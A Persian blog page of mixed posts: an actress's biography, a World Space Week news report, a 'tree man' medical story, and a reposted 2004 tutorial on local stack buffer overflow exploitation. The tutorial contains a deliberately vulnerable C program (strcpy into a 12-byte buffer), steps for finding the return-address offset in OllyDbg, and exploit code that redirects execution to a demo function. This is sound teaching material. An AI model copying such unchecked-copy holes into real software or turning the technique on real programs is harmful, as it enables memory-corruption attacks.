۱۳۸۶ آبان ۲۷, یکشنبه ۱۸:۳۴ By Hamedan , In


۱۸:۳۱ By Hamedan , In


 
عکسهایی از شبنم قلی خانی
 
 
نام: شبنم

نام خانوادگی: قلی خانی
سمت: بازیگر
تاریخ تولد: ۱۹ آبان ۱۳۵۶


بیوگرافی:
در محله آریا شهر تهران متولد شد عاشق فصل پاییزه در دوران مدرسه درس
ریاضی رو خیلی دوست داشت
استاد دانشگاهه مبانی بازیگری- خلاقیت نمایشی- اطلاعات عمومی هنر تدریس

میکنه
مجرده بیشتر نقش مثبت بهش میخوره اما دوست داره نقش منفی هم بازی کنه
کارهای تاریخی رو خیلی دوست داره اولین کارش هم مریم مقدس بود
بسیار با حوصله و خیلی کم عصبانی میشه
بسکتبال- شنا- تنیس ورزش های مورد علاقه ش هستن
استقلالیه
علاقه مند به کارگردانی در عرصه سینما
رشته ش در دبیرستان ریاضی فیزیک بوده و در دانشگاه آزاد فوق لیسانس
کارگردانی تئاتر
سال ۸۳ پدرش رو از دست داد و با مادر و برادرش زندگی میکنه






عاشق شیرینی و کارتون تام و جری هست
بسیار صبور و آرام
اهل مد نیست
اهل چت کردن نیست اهل کامپیوتر هم نیست
تفاوت سنی زیادی بین او و شاگردانش نیست و با آنها مشکلی ندارد
فیلم هایش: عطش- آیه های زمینی- پرده عشق- جوجه اردک من- یک الف ناقابل- اولین
شب آرامش- ما چند نفر- سال های برف و بنفشه بوده
چهره اش بیانگر شخصیت و درون اوست: آرام و متین
اهل غذا خوردن نیست خودشو با تنقلات سیر میکنه
از میان شاعران حافظ رو دوست داره
شعر مورد علاقه ش:
نو بهار است در آن کوش که خوشدل باشی
که بسی گل بدمد باز و تو در گل باشی


 

۱۳۸۶ آبان ۲۵, جمعه ۲۲:۴۷ By Hamedan , In



 



مراسم آخرين روز هفته جهاني فضا 25 آبان ماه با شعار «فضا و شناخت مرزهاي جديد» از سوي انجمن نجوم ايران در پارك ملت تهران برگزار شد.


عليرضا وفا، دبير برگزاري‌ هفته جهاني فضا در انجمن نجوم ايران در گفت‌وگو با خبرنگار «علمي» خبرگزاري دانشجويان ايران (ايسنا) اظهار كرد: برنامه‌هاي هفته جهاني فضا در راستاي گراميداشت آغاز عصر فضا كه مقارن با فرستادن ماهواره اسپوتنيك به فضا بوده، آغاز و با تاخير يك ماهه نسبت به مراسم اين هفته در كشورهاي مختلف در ايران انجام شد، زيرا در دو، سه سال اخير، اين هفته در كشورهاي اسلامي مقارن با ماه مبارك رمضان بود و براي استفاده آسان‌تر مردم از مراسم هفته جهاني فضا اين تدبير انديشيده شد.


وي افزود: هفته جهاني فضا در ايران در روزهاي 19 تا 25 آبان ماه و با هماهنگي سازمان فضايي ايران در بسياري از موسسات و دانشگاه‌ها برنامه‌هاي متنوعي برگزار شد.


وفا با اشاره به برگزاري مراسم اختتاميه اين هفته از سوي انجمن نجوم ايران گفت: بخشي از برنامه‌ها و سخنراني نمايندگان شاخه آماتوري انجمن در شهرستان‌هاي رشت، خوزستان، اهواز، زاهدان، زنجان،‌ كرج،‌ مشهد، يزد، سعادت شهر و كاشان به صورت موازي برگزار شد و برنامه تهران نيز شامل غرفه‌هاي نمايشگاهي گروه‌هاي نجومي و دانشگاه‌هاي مرتبط با علوم فضا و نجوم مي‌باشد كه از 10 تا 19 امروز (جمعه) در پارك ملت تهران برپا مي‌شود. همچنين از ساعت 13 سخنراني‌هاي تخصصي و نمايشي اسلايدهاي علمي برگزار مي‌شود.


مهندس يزدان‌پناه، روابط عمومي سازمان فضايي ايران نيز به ايسنا گفت: با توجه به اينكه از سال آينده مراسم هفته جهاني فضا در روزهاي 12 تا 19 مهرماه (4 تا 11 اكتبر) همزمان با مراسم كشورهاي سراسر جهان برگزار مي‌شود، در نظر داريم تعداد استان‌هاي تحت پوشش را افزايش دهيم و با هماهنگي صدا و سيما برنامه‌هاي مربوط به علوم فضايي در اين هفته پخش شود.


وي در ادامه اظهار كرد: در همه روزهاي هفته جاري در فرهنگسراها،‌ برنامه‌هاي جانبي و ارائه اطلاعات فضايي به علاقه‌مندان برگزار ‌شد و هفت هز

۲۲:۴۵ By Hamedan , In

 

۲۲:۴۳ By Hamedan , In

 

















گربه ها و انواع موسيقي ها

۱۸:۴۳ By Hamedan , In

مردي كه از دست و پايش ريشه بيرون مي زند

۱۸:۴۱ By Hamedan , In

مردي كه در جواني مجبور شده بود زانوهاي خود را به تيغ جراحي بسپرد اكنون با مشكل عجيبي روبرو شده است. از دستان و پاهاي اين مرد، مانند درختان ريشه درآمده است! اين مرد 35 ساله كه "دده" نام دارد بخاطر رويش ريشه از دستها و پاهايش به "مرد درختي" مشهور شده است. وي در 15 سالگي پاهايش به تيغ جراحان سپرده بود. متخصصان مي گويند از هر يك ميليون نفر احتمال اين بيماري تنها در يك نفر وجود دارد. علت اين واقعه عجيب ويروس انساني پاپيلوما (HPV) عنوان شده است. بخاطر رويش ريشه از دستها و پاها و عدم توان كاري مرد 35 ساله شغلش را از دست داد. بعد از آن نيز زنش وي را ترك كرد و با دو بچه اش تنها گذاشت. پروفسور آنتوني گاسپاري، استاد دانشگاه مريلند آمريكا قرار است به وي براي بازگرداندن سلامتي اش كمك كند. گاسپاري به اندونزي رفته و "دده" را پيدا كرده بود. پروفسور گاسپاري راه درمان اين مرد را ويتامين A سنتتيك مي داند. به گفته پروفسور گاسپاري، بيمار بعد از شش ماه درمان ويتامين A سلامتي اش را خواهد يافت و بعد از آن ريشه هاي دست و پاهايش بريده خواهند شد. وي گفت اگر اين درمان جواب نداد بيمار را به آمريكا خواهد برد.

نوشتن Exploit مبتني بر سر ريز بافر

۱۸:۳۹ By Hamedan , In


در مسايل امنیت هکران عزیز و مدیران سایت ها در مساله ایی پیش رفته به مبحث buffer over flow میرسند که به نظر همه مبحث بسیار سنگین میباشد ولی در این تایپیک قصد آموزشی عملی به شما دوستان را دارم پس با ما همراه باشید

اين مقاله در پاييز 1383 تهیه و منتشر گرديد . بنابرین پیشاپیش از دوستان عزیز بابت تكراری بودن آن عذر خواهی می نمایم .

مقدمه

در این مقاله قصد بر این است که مباحث کاربردی ارائه گردند ، بنابرین فرض بر این است که خواننده با مفاهیم تئوری Stack Overrun آشنا می باشد . همچنین به دانش پایه در زمینه برنامه نویسی به زبان C یک Compiler ، و یک Debuger احتیاج دارید .
کدهای ارائه شده در Windows XP – SP1 – 2 و VC++ تست شده است . برنامه های اجرایی و کد منبع آن برای راحتی به صورت فایل فشرده شده قابل دریافت می باشد .
این مقاله مبحث سرریز بافر و نوشتن Exploit را به صورت Local بررسی می نماید و مباحث مربوط به Remote Buffer Overflow Exploitation در مقالات بعدی بررسی خواهد شد .


شروع به کار

قبل از شروع به این سلسله از مباحث این نکته را مد نظر داشته باشید که یادگیری کشف Security Bug و نوشتن Exploit مانند یادگیری ورزشهای رزمی می باشد . هیچگاه هنرهای رزمی را نمی توان با مطالعه یک یا صد کتاب فرا گرفت و متخصص شد ، تا شخص اقدام به تمرین عملی زیر نظر استاد ننماید ، بار ها و بارها شكست نخورد ، نمی تواند فنون را بیاموزد و استاد شود . بنابرین صرف مطالعه این مقاله یا مقالات و کتب دیگر و تمرین ننمودن ، نمی توانید انتظار زیادی از خود داشته باشید .

کد زیر را مطالعه نمایید . این کد دارای دو تابع به نامهای vulner و exploit می باشد. تابع اول دارای خطا می باشد که توسط تابع اصلی فرا خوانی می شود . اما تابع دوم در برنامه در حالت عادی اجرا نمی شود . هدف این می باشد که ما با ایجاد سر ریز بافر در تابع اول ، آدرس برگشت را به آدرس شروع تابع دوم تغییر داده ، و برنامه را مجبور به اجرای تابع دوم و نمایش پیغام " Oooops ! I Hacked by You !!! " بر صفحه نمایش نماییم .

 

کد:

/* Start Code
Stack Buffer Overrun Example 1
Bof.c
By Mehdi Ghassemi
2004-08-26
*/
include <stdio.h>#
include <string.h>#

void vulner(const char* input)

{
char buffer[12] ;
strcpy(buffer,input) ;
printf("%s\n",buffer) ;
}

void exploit(void)
{
printf("Oooops ! I Hacked by You !!!\n") ;

}

int main(int argc , char* argv[])
{
if(argc !=2)
{
printf("Please enter a string.\n") ;
return -1 ;
}

vulner(argv[1]) ;
return 0 ;

}

/* End Code */


ابتدا کد را بررسی می نماییم . برنامه یک رشته از کاربر دریافت نموده و آن را به تابع vulner ارسال می نماید . تابع فراخوانده شده نیز ابتدا یک آرایه به اسم buffer و به طول 12 کارکتر ایجاد نموده و با استفاده از تابع داخلی strcpy رشته دریافت شده کاربر را در buffer کپی می نماید . چنانچه ورودی کاربر کمتر از 12 کارکتر باشد ، در خروجی نمایش داده شده و برنامه به صورت نرمال پایان می پذیرد ، اما اگر ورودی کاربر بیشتر از طول buffer باشد ، چون اندازه ورودی چک و اصلاح نمی شود ، اجرای برنامه دچار مشکل شده و با ارسال پیغام خطا ، خروج غیر نرمال از برنامه را خواهیم داشت .

با این توضیح برنامه را compile و اجرا می نماییم . ابتدا برنامه را با ورودی کمتر از 12 کارکتر چک می کنیم . برنامه بدون مشکل اجرا می شود . حال تعداد کارکترها را یکی یکی افزایش می دهیم . وقتی تعداد کارکتر ورودی به عدد 12 می رسد ، برنامه دچار مشکل سر ریز بافر شده و شکل زیر نمایش داده می شود :

 


حالا مسئله ای که باید بدنبال جوابش باشیم این می باشد که به اندازه چه مقدار ورودی کاربر ، کارکترهای وارد شده بر روی آدرس برگشت به تابع فرا خوان قرار می گیرد . این کار را می توان با افزایش تعداد کارکتر ورودی و کنترل رجیستر EIP در لحظه به وجود آمدن خطا انجام داد .
یک را ساده این می باشد که در همین پنجره خطا که نمایش داده می شود ، بر روی لینک click here کلیک کنیم و مقدار Offset را چک نماییم . همانند شکل زیر :

 


این کار را ادامه می دهیم تا مقدار offset برابر با 4 تا کد اسکی A ، یعنی عدد 41 بشود ، یعنی دقیقاً به این شکل :

41414141 Offset:

اگر این کار را درست انجام داده باشید ، حتماً متوجه شده اید که به ازای 20 کارکتر ورودی ، آدرس برگشت تغییر می یابد . بنابرین 4 کارکتر آخر ، یعنی کارکتر 17 ، 18 ، 19 و 20 . یک سوال اینجا مطرح می شود که پاسخ آن را به عهده خواننده می گذاریم. چرا با آنکه ما سایز بافر را 12 کارکتر تعریف کردیم ، آدرس برگشت از کارکتر 16 به بعد آغاز شده است ؟

همین موضوع را با استفاده از یک Debuger کنترل می کنیم . ما از نرم افزار OllyDbg استفاده نمودیم که به راحتی از اینترنت قابل دریافت می باشد .

برنامه OllyDbg را اجرا می نماییم . به منوی file رفته و open را انتخاب می نماییم فایل bof.exe را انتخاب کرده و در همان پنجره در قسمت Arguments تعداد 20 کارکتر A را تایپ نموده و برنامه را اجرا می کنیم . برنامه load می شود ، اما در حالت paused قرار می گیرد ، قبل از اجرای برنامه ، به مقدار رجیستر EIP که در سمت راست نمایش داده شده است ، دقت نمایید . حالا با کلیک بر روی play برنامه را اجرا می نماییم . در این حالت مقدار رجیستر EIP به 41414141 تغییر پیدا می نماید . اگر همین عمل را با تعداد 17 ، 18 و 19 کارکتر انجام بدهید ، باید به نتیجه زیر برسید :

 
کد:



17 کارکتر A ==> 00000041 EIP =
18کارکتر A ==> 00004141 EIP =
19 کارکتر A ==> 00414141 EIP =
20 کارکتر A ==> 41414141 EIP =



 

البته ممکن است در بعضی از حالت ها بجای صفر اعداد دیگری باشد که مهم نمی باشد .
از این موضوع باید به این نتیجه برسیم که وقتی کارکتر ورودی از سمت راست افزایش پیدا می نماید ، قرار گیری بر روی رجیستر از سمت چپ انجام می شود . این موضوع را باید در هنگام نوشتن exploit رعایت نماییم . یعنی ترتیب قرار گیری آدرس را بر عکس نماییم .
حال باید به دنبال آدرس تابع exploit بگردیم تا با قرار دادن آن در خانه های 17 تا 20 ، به نتیجه دلخواه برسیم . برای این کار مجدداً OllyDbg را اجرا نموده و این بار bof.exe را با تعداد کارکتر نرمال که باعث سر ریز نشود اجرا می نماییم . از این مرحله به بعد ممکن است آدرس های بدست آمده با آنچه در اینجا ذکر می شود متفاوت باشد ، شما آدرسهایی که خودتان بدست می آورید ملاک قرار دهید .
در پنجره OllyDbg مطابق شکل زیر بدنبال رشته "Ooops! …" مربوط به تابع exploit می گردیم .

 


همانطور که در شکل مشخص می باشد ، OllyDbg تابع مورد نظر را با رنگ تیره تر مشخص نموده و آن را به اسمبلی تبدیل نموده است . در اینجا آدرس که با یک کادر قرمز رنگ مشخص شده است ، 00401090 می باشد . اگر کمی کنجکاوی به خرج دهید و صفحه را به بالا ببرید و به ابتدای کد اسمبلی مربوط برسید ، به سه دستور jmp بر می خورید که مربوط به سه تابع فایل bof.exe می باشد . می توانیم از آدرس 00401090 jmp نیز برای نوشتن exploit استفاده نماییم . نتیجه حاصله یکی می باشد . در اینجا از آدرس مستقیم استفاده شده است .
حال اطلاعات لازم برای نوشتن این exploit را داریم . اگر به C مسلط باشید ، به روشهای مختلف می توانید این exploit را بنویسید . ما خیلی ساده این برنامه را نوشتیم . کد exploit می تواند مثل قطعه کد زیر باشد :

 
کد:

/* Start Code
Stack Buffer Overrun Exploit Example 1
Expbof.c
By Mehdi Ghassemi
2004-08-27
*/
#include <windows.h>
#include <stdio.h>
unsigned char address[]= "\x90\x10\x40";
int main(void)
{
unsigned char buffer[28] ;
strcpy(buffer,"bof.exe ");
strcat(buffer,"MMMMMMMMMMMMMMMM");
strcat(buffer,address);
WinExec(buffer,SW_MAXIMIZE);
return 0;
}



 

در این کد که بسیار ساده می باشد ، تنها نکته همان قرار گیری آدرس می باشد که همانطور که اشاره شده ، به

۱۸:۳۷ By Hamedan , In

کلیپ بسیار جالب و زیبای بالا رفتن از دیوار راست توسط یک پیرزن !




 



حجم : 2 مگابایت

دانلود از سرور 1

دانلود از سرور 2 (لینک کمکی)
 

فهرست نوابغ جهان

۱۸:۳۵ By Hamedan , In